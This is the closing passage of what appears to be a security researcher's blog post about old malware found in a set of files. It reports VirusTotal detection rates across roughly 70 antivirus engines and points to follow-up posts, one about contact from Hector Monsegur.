The good news is this: the malware I have so far identified is old. So old that those using the latest versions of the software noted as vulnerable earlier are very likely safe even when opening these files. I scanned a number of these files using VirusTotal, and a significant number of antivirus engines detected an issue with them. The flip side of this positive spin is that at best only half of the roughly 70 antivirus engines VirusTotal ran against these files detected malicious software, and some files were flagged by only 15 of them.

One last note: I will almost certainly be updating this post and writing additional information about what I find as I continue my research. This is very much a "work in progress". I welcome all additional information, particularly information that conflicts with or adds to what I have found so far.

NOTE: my second post on this on this topic is online, and contains further malware analysis.

Hector Monsegur, formerly Sabu of LulzSec, contacted me. Our discussion is available in my third post.
